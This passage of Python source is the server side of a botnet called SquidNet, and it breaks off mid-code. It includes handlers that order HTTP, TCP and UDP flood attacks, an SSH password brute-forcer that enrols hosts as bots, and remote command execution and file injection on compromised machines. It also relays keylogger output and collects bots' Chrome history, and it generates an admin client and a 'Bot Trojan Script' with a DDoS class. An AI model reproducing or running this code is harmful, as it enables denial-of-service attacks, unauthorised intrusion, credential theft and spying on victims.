split_info = info.split()
result += f"\n| {self.wrap_item(split_info[0], 24)}| {self.wrap_item(split_info[1], 19)}| {self.wrap_item(split_info[2], 15)}| {self.wrap_item(split_info[3], 15)}| {self.wrap_item(split_info[4], 12)}|"
result += "\n|_______________________|__________________|______________|______________|___________|"
result += """
SSH Connections:
________________________________________________________
| | | |
| Hostname | IP Address | Password |
|_______________________|_______________|______________|"""
for info in self.ssh_info:
split_info = info.split()
result += f"\n| {self.wrap_item(split_info[0], 24)}| {self.wrap_item(split_info[1], 19)}| {self.wrap_item(split_info[2], 15)}|"
result += "\n|_______________________|_______________|______________|\n"
return result
def handler(self, c, hostname, number, info):
"""Function recieves packets from the connections. This is needed for clients
to send packets to the botnet so the Admin can see what the Bots are sending.
This is needed also for password grabbing and information obtaining. This
function is also important for admin connections as they need to send and
receive packets. It also handles the connections and keeps them alive."""
admin = False
isbot = False
while True:
try:
msg = c.recv(65500)
if self.savefile or self.obtaininghistory:
pass
else:
try:
msg = msg.decode()
except Exception as e:
msg = str(msg)
self.log(f"\n[(ERROR)]: {str(e)}")
if not isbot:
if msg == "!CLIENTLOG":
isbot = True
msgtoadmin = f"[(SERVER)]: {hostname} is recognized as part of the Botnet."
self.log("\n" + msgtoadmin)
print(f"[!] {hostname} is recognized as part of the Botnet.")
for adm in self.admin_conn:
try:
adm.send(msgtoadmin.encode())
except Exception as e:
self.log(f"\n[(ERROR)]: {str(e)}")
self.conn_list.append(c)
else:
print(f"[!] WARNING: {hostname} IS NOT PART OF THE BOTNET.\n[!] Closing Connection.....")
c.close()
break
if isbot:
if not admin:
if str(type(msg)) == "str":
if msg.startswith('!login'):
msg_split = msg.split()
name = msg_split[1]
passw = msg_split[2]
try:
passw = passw.encode()
except Exception as e:
self.log(f"\n[(ERROR)]: {str(e)}")
hashed_passw = hashlib.sha256(passw).hexdigest()
if hashed_passw == self.admin_password and name == self.admin_name:
try:
admin = True
print(f"[!] {hostname} is an Admin!")
hostname = f"ADMIN)({hostname}"
msgtoadmin = f"[(SERVER)]: {hostname} is an Admin!"
self.log("\n" + msgtoadmin)
for admi in self.admin_conn:
try:
admi.send(msgtoadmin.encode())
except Exception as e:
self.log(f"\n[(ERROR)]: {str(e)}")
self.admin_conn.append(c)
try:
c.send(self.welcomemsg.encode())
except:
pass
self.log(f"\n[(SERVER)---->({hostname})]: Sent welcome message.")
self.admininfo.append(info)
except:
pass
else:
c.send("Access Denied!".encode())
msgtoall = f"[(ATTEMPTEDBREACHWARNING)]: {hostname} attempted to login to the botnet with incorrect credentials!\n[(ATTEMPTEDBREACHWARNING)]: Closing Connection...."
self.log("\n" + msgtoall)
print(msgtoall)
for admins in self.admin_conn:
try:
admins.send(msgtoall.encode())
except Exception as e:
self.log(f"\n[(ERROR)]: {str(e)}")
c.close()
break
elif msg.startswith("!sendkey"):
msg_split = msg.split()
del msg_split[0]
main_msg = ""
for i in msg_split:
main_msg = main_msg + " " + i
main_msg = main_msg.strip()
logthis = f"[({hostname})]: {main_msg}"
if self.displaykeys:
print(logthis)
if self.obtaininghistory:
try:
if msg.decode().strip() == "":
pass
else:
self.historyfile.write(f"\n[({hostname})]: ".encode() + msg)
except:
self.historyfile.write(f"\n[({hostname})]: ".encode() + msg)
if admin:
if msg.startswith('!httpflood'):
msgtobot = msg.split()
try:
targ_website = msgtobot[1]
atk_delay = msgtobot[2]
servmsg = f"[({hostname})]: Beginning HTTP Flood Attack on {targ_website} with delay of {atk_delay}.\n"
self.log("\n" + servmsg)
print(servmsg)
c.send(
f"Successfully started an HTTP Flood Attack on {targ_website} wth a delay of {atk_delay}".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Successfully started an HTTP Flood Attack on {targ_website} wth a delay of {atk_delay}")
except:
msg = "help"
c.send("Invalid Parameters!".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Invalid Parameters!")
elif msg.startswith('!tcpflood'):
msgtobot = msg.split()
try:
target = msgtobot[1]
servmsg = f"[({hostname})]: Beginning TCP Flood Attack on {target}.\n"
self.log("\n" + servmsg)
print(servmsg)
c.send(
f"Successfully started a TCP Flood Attack on {target}".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Successfully started a TCP Flood Attack on {target}")
except:
msg = "help"
c.send("Invalid Parameters!".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Invalid Parameters!")
elif msg.startswith("!getchromehistory"):
try:
file = open("BotsHistory.txt", "rb").read()
if len(str(file)) == 0:
c.send(
"[(SERVER)]: Unable to send Bots history from the bots(Needs to be obtained on the server-side).".encode())
else:
c.send("[(SERVER)]:".encode() + file)
except:
c.send(
"[(SERVER)]: Unable to send Bots history from the bots(Needs to be obtained on the server-side).".encode())
elif msg.startswith('!udpflood'):
msgtobot = msg.split()
try:
target = msgtobot[1]
servmsg = f"[({hostname})]: Beginning UDP Flood Attack on {target}.\n"
self.log("\n" + servmsg)
print(servmsg)
c.send(
f"Successfully started a UDP Flood Attack on {target}".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Successfully started a UDP Flood Attack on {target}")
except:
msg = "help"
c.send("Invalid Parameters!".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Invalid Parameters!")
elif msg.startswith('!help'):
c.send(self.welcomemsg.encode())
elif msg.startswith("!infect"):
if self.passfile != False:
msg_split = msg.split()
ip = msg_split[1]
username = msg_split[2]
bruteforcer = threading.Thread(target=self.ssh_infect, args=(ip, username))
bruteforcer.start()
else:
c.send(
"[(SERVER)]: Botnet is configured without ssh bruteforcing. Cannot bruteforce!".encode())
self.log(
f"\n[(SERVER)---->({hostname})]: Botnet is configured without ssh bruteforcing. Cannot bruteforce!")
elif msg.startswith("!keylog"):
msg_split = msg.split()
try:
self.displaykeys = bool(msg_split[1])
except:
self.displaykeys = False
self.log("\n[(SERVER)]: Started Keylogging on the bots.")
c.send(
f"[(SERVER)]: Set displaying Key-inputs to the server to: {self.displaykeys}".encode())
elif msg.startswith("!stopkeylog"):
self.log("\n[(SERVER)]: Stopped Keylogging on the bots.")
elif msg.startswith("!sshlogin"):
msg_split = msg.split()
ip = msg_split[1]
username = msg_split[2]
password = msg_split[3]
login = threading.Thread(target=self.ssh_login, args=(ip, username, password))
login.start()
elif msg.startswith("!getconninfo"):
c.send(str("[(SERVER)]:\n" + self.gen_conntable()).encode())
self.log(f"\n[(SERVER)---->({hostname})]:\n{self.gen_conntable()}")
elif msg.startswith("!inject"):
msg_split = msg.split()
file = msg_split[1]
for bot in self.ssh_bots:
self.ssh_inject(bot, file)
elif msg.startswith("!listsshbots"):
c.send(f"[(SERVER)]: Connected SSH Bots: {self.display_bots}".encode())
self.log(f"\n[(SERVER)---->({hostname})]: Connected SSH Bots: {self.display_bots}")
if "!login" in msg.strip() or "!help" in msg.strip() or "!getconninfo" in msg.strip() or "!listsshbots" in msg.strip() or "!getchromehistory" in msg.strip() or self.obtaininghistory:
pass
else:
if len(self.ssh_bots) != 0:
sendtossh = threading.Thread(target=self.send_ssh, args=(msg,))
sendtossh.start()
for connect in self.conn_list:
if connect in self.admin_conn:
pass
else:
try:
connect.send(msg.encode())
except:
connect.send(msg)
if msg == "" or msg == " ":
pass
else:
if self.savefile:
try:
if msg.decode() == "finished":
savefile = False
except:
pass
filenames = f"{number}{self.botfile}"
file_created = False
try:
file = open(filenames, 'rb')
file_content = file.read()
file_created = True
except:
file = open(filenames, 'wb')
file.write(msg)
file_content = msg
file.close()
file_created = True
if file_created:
file = open(filenames, 'wb')
try:
file.write(file_content.encode())
except:
file.write(file_content)
try:
file.write(msg.encode())
except:
file.write(msg)
file.close()
filemsg = f"\n[({hostname})]: Saved contents of {self.botfile} into {filenames}"
print(filemsg)
self.log(filemsg)
file_created = False
elif not self.savefile:
try:
if not self.obtaininghistory:
msgtoadmin = f"[({hostname})]: {msg.strip()}"
self.log("\n" + msgtoadmin)
if not msg.startswith("!sendkey"):
print("\n" + msgtoadmin)
except Exception as e:
self.log(f"\n[(ERROR)]: {e}")
for adminconn in self.admin_conn:
try:
if c == adminconn:
pass
else:
adminconn.send(msgtoadmin.encode())
except Exception as e:
self.log(f"\n[(ERROR)]: Unable to send msg to: {adminconn}.")
except Exception as e:
if "a bytes-like object is required, not 'str'" in str(
e) or "An operation was attempted on something that is not a socket" in str(
e) or "startswith first arg must be bytes or a tuple of bytes, not str" in str(e):
self.log(f"\n[(ERROR)]: Ignoring Error {e} in {hostname}")
else:
self.log(
f"\n[(ERROR)]: {hostname} seems defective(Error: {e}).\n[(CLOSECONN)]: Closing connection....")
print(f"\n[!] {hostname} seems defective.\n[!] Closing connection....\n")
c.close()
break
def ssh_login(self, ip, username, password):
"""Does regular logging in with SSH into the provided ip and username. There is no
brute-forcing since a password arguement has be passed, and that the brute-force text
file is not used."""
print(f"[+] Attempting to login to {username}@{ip}\n[+] With password: {password}")
msgtoadmin = f"[(SERVER)]: Attempting to login to {username}@{ip}\n[(SERVER)]: With password: {password}"
self.log('\n' + msgtoadmin)
for admin in self.admin_conn:
try:
admin.send(msgtoadmin.encode())
except:
pass
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(ip, 22, username, password)
self.ips.append(ip)
self.display_bots.append(f"{username}@{ip}")
self.ssh_bots.append(client)
self.ssh_info.append(str(username) + " " + str(ip) + " " + str(password))
self.ssh_botlist.append(str(client) + ' ' + str(username))
msgtoadmin = f"[(SERVER)]: {ip}'s Password has been found!: {password}\n[(SERVER)] Adding {username}@{ip} to the botnet.\n"
self.log('\n' + msgtoadmin)
for admin in self.admin_conn:
try:
admin.send(msgtoadmin.encode())
except:
pass
print(
f"\n[!] Successfully logged into {username}@{ip} with {password}!\n[!] Adding {username}@{ip} to the botnet.\n")
except Exception as e:
print(f"[+] Unable to login to {ip}@{username}\n[+] Try using different credentials.")
msgtoadmin = f"[(SERVER)]: Unable to log into {username}@{ip} due to: {e}"
self.log("\n" + msgtoadmin)
for admin in self.admin_conn:
try:
admin.send(msgtoadmin.encode())
except:
pass
def ssh_infect(self, ip, username):
"""Attempts to brute force the ip and username with the password list provided
from the txt file specified in the __init__ function."""
print(f"[+] Brute Forcing the Password for: {username}@{ip}\n")
msgtoadmin = f"[(SERVER)]: Brute Forcing the Password for: {username}@{ip}\n"
self.log('\n' + msgtoadmin)
for admin in self.admin_conn:
try:
admin.send(msgtoadmin.encode())
except:
pass
flag = 0
for password in self.passwords:
try:
if flag == 1:
break
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
passw = password.strip()
client.connect(ip, 22, username, passw, timeout=2, auth_timeout=2)
self.ips.append(ip)
self.display_bots.append(f"{username}@{ip}")
self.ssh_bots.append(client)
self.ssh_info.append(str(username) + " " + str(ip) + " " + str(passw))
self.ssh_botlist.append(str(client) + ' ' + str(username))
msgtoadmin = f"[(SERVER)]: {ip}'s Password has been found!: {passw}\n[(SERVER)] Adding {username}@{ip} to the botnet.\n"
self.log('\n' + msgtoadmin)
for admin in self.admin_conn:
try:
admin.send(msgtoadmin.encode())
except:
pass
print(f"\n[!] {ip}'s Password has been found!: {passw}\n[!] Adding {username}@{ip} to the botnet.\n")
flag = 1
break
except:
client.close()
if flag == 0:
msgtoadmin = f"[(SERVER)]: Unable to Brute Force password for {username}@{ip}"
self.log("\n" + msgtoadmin)
for admin in self.admin_conn:
try:
admin.send(msgtoadmin.encode())
except:
pass
print(f"\n[?] Unable to Brute Force password for {username}@{ip}")
def send_ssh(self, instruction):
"""Sends instructions to the SSH-Bots. The output will also be sent
back to the Server for the admins to see."""
try:
for bot in self.ssh_bots:
for usernames in self.ssh_botlist:
if str(bot) in usernames:
split_item = usernames.split()
username = split_item[4]
try:
stdin, stdout, stderr = bot.exec_command(instruction, get_pty=True)
stdin.close()
output = stdout.read().decode()
if output.strip() == "":
pass
else:
msgtoclient = f"\n[({username})]: {output.strip()}"
self.log(msgtoclient)
print(msgtoclient)
for admin in self.admin_conn:
try:
admin.send(msgtoclient.encode())
except:
self.log(f"[(ERROR)]: Unable to send message to {admin}.")
except:
bot.close()
except:
pass
def ssh_inject(self, client, file):
"""This function Opens up SFTP(Secure File Transfer Protocol) and
sends a file to the SSH-Bots, where they can be opened up on command."""
try:
if "/" in file or "\\" in file:
result = ""
for letter in file:
if letter == "/" or letter == "\\":
result += " "
else:
result += letter
split_result = result.split()
file = split_result[(len(split_result) - 1)]
file_dir = ""
for item in split_result:
if item == file:
pass
else:
file_dir = file_dir + item + "/"
os.chdir(file_dir)
for usernames in self.ssh_botlist:
if str(client) in usernames:
split_item = usernames.split()
username = split_item[4]
try:
sftp = client.open_sftp()
sftp.put(file, f'C:/{username}/{file}')
except:
sftp = client.open_sftp()
sftp.put(file, f'/Users/{username}/{file}')
os.chdir(self.cwd)
except:
pass
def reset_historyvar(self):
"""Resets the 'self.obtaininghistory' variable to false,
so that the bot messages would return to normal."""
time.sleep(10)
self.obtaininghistory = False
self.historyfile.close()
print("\n[+] You are now able to freely send messages to the bots.")
def instruct(self):
"""Server-Side Sending intructions to the bots. This is so that the Server
can also send packets to the Bots which they can send info back to the Server
and admins."""
self.savefile = False
while True:
try:
self.instruction = input("[+] Enter instruction to the bots: ")
if self.instruction == "!botcount":
print(f"[+] Current Connected Bots: {self.bot_count}\n")
elif self.instruction == "!clear":
if sys.platform == "win32":
os.system("cls")
else:
os.system("clear")
self.logo()
self.usage()
elif self.instruction.startswith('!savefile'):
instruction_split = self.instruction.split()
self.botfile = instruction_split[1]
self.savefile = True
print("[+] Savefile commenced")
elif self.instruction.startswith("!genadminscript"):
filename = "SquidNetMaster.py"
contents = self.gen_admin()
file = open(filename, 'w')
file.write(contents)
file.close()
print(f"[+] File '{filename}' has been generated in dir '{os.getcwd()}'\n")
self.log(f"\n[(FILECREATION)]: File '{filename}' has been generated in dir '{os.getcwd()}'\n")
elif self.instruction.startswith("!httpflood"):
msgtobot = self.instruction.split()
try:
targ_website = msgtobot[1]
atk_delay = msgtobot[2]
print(f"[+] Beginning HTTP Flood Attack on {targ_website} with delay of {atk_delay}.\n")
except:
self.instruction = "help"
print("[+] Invalid Parameters!\n")
elif self.instruction.startswith("!getchromehistory"):
self.obtaininghistory = True
print(
"[+] Obtaining Bot Chrome history. It is highly suggested you do not give any commands at the moment.")
print("[+] Please wait 10 seconds before doing anything.")
self.historyfile = open("BotsHistory.txt", "wb")
print("[+] File with Bot Chrome History: BotsHistory.txt")
resetter = threading.Thread(target=self.reset_historyvar)
resetter.start()
elif self.instruction.startswith("!tcpflood"):
msgtobot = self.instruction.split()
try:
target = msgtobot[1]
print(f"[+] Beginning TCP Flood Attack on {target}.\n")
except:
self.instruction = "help"
print("[+] Invalid Parameters!\n")
elif self.instruction.startswith("!udpflood"):
msgtobot = self.instruction.split()
try:
target = msgtobot[1]
print(f"[+] Beginning UDP Flood Attack on {target}.\n")
except:
self.instruction = "help"
print("[+] Invalid Parameters!\n")
elif self.instruction == "!resettoken":
self.key = Fernet.generate_key()
with open('token.txt', 'w') as tokenfile:
tokenfile.write(str(self.key))
tokenfile.close()
print(
f"[+] The token has been reset to: {str(self.key)}\n[+] Note that you should regenerate a script to have the same token as the one in this script.\n")
self.log(f"\n[(TOKENRESET)]: Encryption key changed to: {str(self.key)}")
elif self.instruction == "!genscript":
filename = 'SquidNetBot.py'
file = open(filename, 'w')
contents = self.bot_script()
file.write(contents)
file.close()
print(f"[+] File '{filename}' has been generated in dir '{os.getcwd()}'\n")
self.log(f"\n[(FILECREATION)]: File '{filename}' has been generated in dir '{os.getcwd()}'\n")
elif self.instruction == "!stopatk":
print("[+] Attempting to stop all DDoS Attacks in the botnet.\n")
self.log("\n[(STOPATK)]: Attempting to stop all DDoS Attacks in the botnet.\n")
elif self.instruction == "!help":
self.usage()
elif self.instruction.startswith("!infect"):
if self.passfile != False:
instruction_split = self.instruction.split()
ip = instruction_split[1]
username = instruction_split[2]
brute_force = threading.Thread(target=self.ssh_infect, args=(ip, username))
brute_force.start()
else:
print("[+] Unable to bruteforce. Configure a password file to do so.\n")
elif self.instruction.startswith("!inject"):
msg_split = self.instruction.split()
filename = msg_split[1]
self.log(f"\n[(SERVER)]: Infecting all SSH Bots with {filename}")
for bot in self.ssh_bots:
injector = threading.Thread(target=self.ssh_inject, args=(bot, filename))
injector.start()
elif self.instruction.startswith("!listsshbots"):
print(f"[+] Connected SSH Bots: {self.display_bots}")
elif self.instruction.startswith("!keylog"):
msg_split = self.instruction.split()
try:
self.displaykeys = bool(msg_split[1])
except:
self.displaykeys = False
print(f"[+] Setting Display key-inputs to output to: {self.displaykeys}.")
self.log("\n[(SERVER)]: Started Keylogging on the bots.")
elif self.instruction.startswith("!stopkeylog"):
self.log("\n[(SERVER)]: Stopped Keylogging on the bots.")
elif self.instruction.startswith("!sshlogin"):
msg_split = self.instruction.split()
ip = msg_split[1]
username = msg_split[2]
password = msg_split[3]
self.ssh_login(ip, username, password)
elif self.instruction.startswith("!getconninfo"):
print(self.gen_conntable())
self.log(f"[(SERVER)]: Displayed Conn Table for Server.\n{self.gen_conntable()}")
elif self.instruction.startswith("!editfile"):
msg_split = self.instruction.split()
filename = msg_split[1]
print(f"[+] Attempting to open file editor for file {filename} on the bots.")
self.log(f"\n[(SERVER)]: Attempting to open file editor for file {filename} on the bots.")
elif self.instruction.startswith("!togglelisten"):
if self.listenforconn == True:
print("[+] Stopped listening for connections.\n")
self.log("\n[(SERVER)]: Stopped listening for connections.")
self.listenforconn = False
else:
print("[+] Restarted listening for connections.\n")
self.log("\n[(SERVER)]: Started to listen for connections.")
self.listenforconn = True
elif self.instruction.startswith("!kick"):
msg_split = self.instruction.split()
host = msg_split[1]
port = msg_split[2]
conntokick = ""
for i in self.connportlist:
if host + "" in i and port + " " in i:
conntokick = i
break
if conntokick == "":
print("\n[+] Hostname or port is not registered in the botnet.")
self.log(
f"\n[(SERVER)]: Attempted to kick {host} from source port {port} but it did not exist.")
else:
for conn in self.conn_list:
if str(conn) in conntokick:
print(f"\n[+] Successfully kicked {host}.")
self.log(f"\n[(SERVER)]: Kicked {host} at source port: {port}")
conn.close()
break
elif self.instruction.startswith("!whatsnew"):
print("""
[+] New Features In the SquidNet:
[+] - Added Web-Interface(http://127.0.0.1:8080)!
[+] - Fixed Variable bug in regular SSH Login Function(passw-->password)
[+] - Optimized the code.
[+] - Fixed web-interface server slowing down Botnet.
[+] - Fixed NotSamePassException Errors.
[+] - Fixed Error in self.send_ssh that would flood output with errors.
[+] - Fixed Error in Stopping DDoS Attacks(tried to call a bool object and not function).
[+] - Made password list optional(however brute forcing cannot happen).
[+] - Added '!cloneself' Command.
[+] - Fixed more errors on the admins being kicked without reason.
[+] - Upgraded reverse shell messages.
[+] - Added '!getconninfo' Command.
[+] - Made it so that '!clear', '!genscript' and '!genadminscript' are not sent to the clients.
[+] - Fixed typos.
[+] - Added '!kick' and '!togglelisten'
[+] - Added Keylogging to the bots.
[+] - Added display message when there is an error with binding the server.
[+] - Fixed bug that kicks bots when wanting to view content from a file remotely or when sending bytes.
[+] - Improved Logging Function.
[+] - Replace '--nH' and '--nP' arguements with '--eH' and '--eP'(external-host and port).
[+] - Replaced some text in the help message.
[+] - Made default admin password a random integer, rather than 'root'.
[+] - Removed unnessecary modules.
[+] - Chrome history obtaining is now possible on the bots ;).
[+] - Changed hashing algorithim to sha256.
""")
if "!clear" in self.instruction.strip() or "!genscript" in self.instruction.strip() or "!genadminscript".strip() in self.instruction.strip() or "!whatsnew" in self.instruction.strip() or "!getconninfo" in self.instruction.strip() or "listsshbots" in self.instruction.strip() or "!togglelisten" in self.instruction.strip():
pass
else:
if len(self.ssh_bots) != 0:
sendtossh = threading.Thread(target=self.send_ssh, args=(self.instruction,))
sendtossh.start()
self.log(f"\n[(SERVER)---->(ADMINS)]: Sent '{self.instruction}' to the bots.")
for conn in self.conn_list:
try:
if conn in self.admin_conn:
conn.send(f"[(SERVER)]: Sent '{self.instruction}' to the bots.".encode())
else:
conn.send(self.instruction.encode())
except:
self.log(f"\n[(ERROR)]: Unable to send message to {conn}.")
self.log(f"\n[(SERVER)]: {self.instruction}")
except Exception as e:
self.log(f"\n[(ERROR)]: {str(e)}")
def gen_admin(self):
"""Generates the admin for remote admin connections to the BotNet."""
script = """
import socket, threading, os, time, urllib.request, sys
class BotMaster:
def __init__(self, ip, port, name, admin_password):
self.ip = ip
self.port = port
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect((self.ip, self.port))
msg = str(socket.gethostname() + " " + self.getip() + " " + os.getlogin()+" "+sys.platform).encode()
self.client.send(msg)
self.name = name
self.admin_password = admin_password
time.sleep(1)
self.client.send("!CLIENTLOG".encode())
time.sleep(1)
self.client.send(f"!login {self.name} {self.admin_password}".encode())
self.logo()
print("\\n[+] Successfully logged into the Botnet!")
print("[+] You are able to access the Botnet and also give commands to all of the connected bots!")
print("")
self.reciever = threading.Thread(target=self.recv)
self.reciever.start()
self.sender = threading.Thread(target=self.send)
self.sender.start()
def logo(self):
print('''
_____ _ _ __ __ _
/ ____| (_) | | \/ | | |
| (___ __ _ _ _ _ __| | \ / | __ _ ___| |_ ___ _ __
\___ \ / _` | | | | |/ _` | |\/| |/ _` / __| __/ _ \ '__|
____) | (_| | |_| | | (_| | | | | (_| \__ \ || __/ |
|_____/ \__, |\__,_|_|\__,_|_| |_|\__,_|___/\__\___|_|
| |
|_|
SquidNet Admin Script By DrSquid''')
def getip(self):
try:
url = 'https://httpbin.org/ip'
req = urllib.request.Request(url)
result = urllib.request.urlopen(req)
try:
result = result.read().decode()
except:
result = result.read()
contents = result.split()
ip = contents[2].strip('"')
return ip
except:
pass
def send(self):
while True:
try:
msg = input("[(ADMIN)]: ")
self.client.send(msg.encode())
except:
print("[+] There may be a server error. Try to relogin to the botnet.")
def recv(self):
while True:
try:
msg = self.client.recv(65500).decode()
if msg == "":
pass
else:
print('\\n' + msg)
except:
print("\\n[+] Possible Server Error! Try to re-login to the Botnet!")
print("[+] If this is a re-occuring message, contact the Server Owner.")
print("\\n[+] Attempting to re-connect to the server.")
while True:
try:
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect((self.ip, self.port))
msg = str(
socket.gethostname() + " " + self.getip() + " " + os.getlogin() + " " + sys.platform).encode()
self.client.send(msg)
time.sleep(1)
self.client.send("!CLIENTLOG".encode())
time.sleep(1)
self.client.send(f"!login {self.name} {self.admin_password}".encode())
print("[+] Successfully Logged Back Into the botnet.")
break
except:
pass
admin = BotMaster('""" + self.ngroklink + """',""" + str(
self.ngrokport) + """,'""" + self.admin_name + """','""" + self.passw + """')
"""
return script
def bot_script(self):
"""Generates the Bot Trojan Script needed to connect to this server and run commands from it.
Test it and see what it does! It will respond to all commands, and it will do either any of
the in-built commands or run any other instructions with command prompt/terminal."""
script = """
#-----SquidNet-Bot-Script-----#
import socket, time, os, threading, urllib.request, shutil, sys, random, base64, sqlite3, json, subprocess, re, shutil, ctypes
from datetime import datetime, timedelta
try:
from pynput.keyboard import Listener # pip install pynput
except:
pass
try:
import win32crypt # pip install pypiwin32
except:
pass
try:
from cryptography.fernet import Fernet # pip install cryptography
except:
pass
try:
from Crypto.Cipher import AES # pip install pycryptodome
except:
pass
class DDoS:
def __init__(self, ip, delay):
self.ip = ip
self.delay = delay
self.stopatk = False
self.useragents = self.obtain_user_agents()
self.referers = self.obtain_referers()
self.threader = threading.Thread(target=self.start_thr)
self.threader.start()
def obtain_referers(self):
referers = ['http://www.google.com/?q=', 'http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..',
'http://vk.com/profile.php?redirect=', 'http://www.usatoday.com/search/results?q=',
'http://engadget.search.aol.com/search?q=query?=query=..',
'https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882',
'https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925',
'http://yandex.ru/yandsearch?text=',
'https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832',
'http://go.mail.ru/search?mail.ru=1&q=', 'http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..',
'http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..',
'http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..',
'http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..',
'http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..',
'/#hl=en-US?&newwindow=1&safe=off&sclient=psy=?-ab&query=%D0%BA%D0%B0%Dq=?0%BA+%D1%83%()_D0%B1%D0%B=8%D1%82%D1%8C+%D1%81bvc?&=query&%D0%BB%D0%BE%D0%BD%D0%B0q+=%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+%D1%87%D0%BB%D0%B5%D0%BD&oq=q=%D0%BA%D0%B0%D0%BA+%D1%83%D0%B1%D0%B8%D1%82%D1%8C+%D1%81%D0%BB%D0%BE%D0%BD%D0%B0+%D1%80%D1%83%D0%B6%D1%8C%D0%B5+%D0%BA%D0%B0%D0%BA%D0%B0%D1%88%D0%BA%D0%B0+%D0%BC%D0%BE%D0%BA%D1%DO%D2%D0%B0%D1%81%D0%B8%D0%BD%D1%8B+?%D1%87%D0%BB%D0%B5%D0%BD&gs_l=hp.3...192787.206313.12.206542.48.46.2.0.0.0.190.7355.0j43.45.0.clfh..0.0.ytz2PqzhMAc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=?882',
'http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..',
'http://www.google.ru/url?sa=t&rct=?j&q=&e..',
'http://help.baidu.com/searchResult?keywords=', 'http://www.bing.com/search?q=',
'https://www.yandex.com/yandsearch?text=', 'https://duckduckgo.com/?q=',
'http://www.ask.com/web?q=',
'http://search.aol.com/aol/search?q=', 'https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=',
'https://drive.google.com/viewerng/viewer?url=', 'http://validator.w3.org/feed/check.cgi?url=',
'http://host-tracker.com/check_page/?furl=',
'http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=',
'http://jigsaw.w3.org/css-validator/validator?uri=', 'https://add.my.yahoo.com/rss?url=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
'http://eu.battle.net/wow/en/search?q=',
'http://engadget.search.aol.com/search?q=', 'http://careers.gatesfoundation.org/search?q=',
'http://techtv.mit.edu/search?q=', 'http://www.ustream.tv/search?q=',
'http://www.ted.com/search?q=',
'http://funnymama.com/search?q=', 'http://itch.io/search?q=', 'http://jobs.rbs.com/jobs/search?q=',
'http://taginfo.openstreetmap.org/search?q=', 'http://www.baoxaydung.com.vn/news/vn/search&q=',
'https://play.google.com/store/search?q=', 'http://www.tceq.texas.gov/@@tceq-search?q=',
'http://www.reddit.com/search?q=', 'http://www.bestbuytheater.com/events/search?q=',
'https://careers.carolinashealthcare.org/search?q=', 'http://jobs.leidos.com/search?q=',
'http://jobs.bloomberg.com/search?q=', 'https://www.pinterest.com/search/?q=',
'http://millercenter.org/search?q=', 'https://www.npmjs.com/search?q=',
'http://www.evidence.nhs.uk/search?q=', 'http://www.shodanhq.com/search?q=',
'http://ytmnd.com/search?q=',
'http://www.google.com/?q=', 'http://www.google.com/?q=', 'http://www.google.com/?q=',
'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=',
'https://steamcommunity.com/market/search?q=', 'http://filehippo.com/search?q=',
'http://www.topsiteminecraft.com/site/pinterest.com/search?q=',
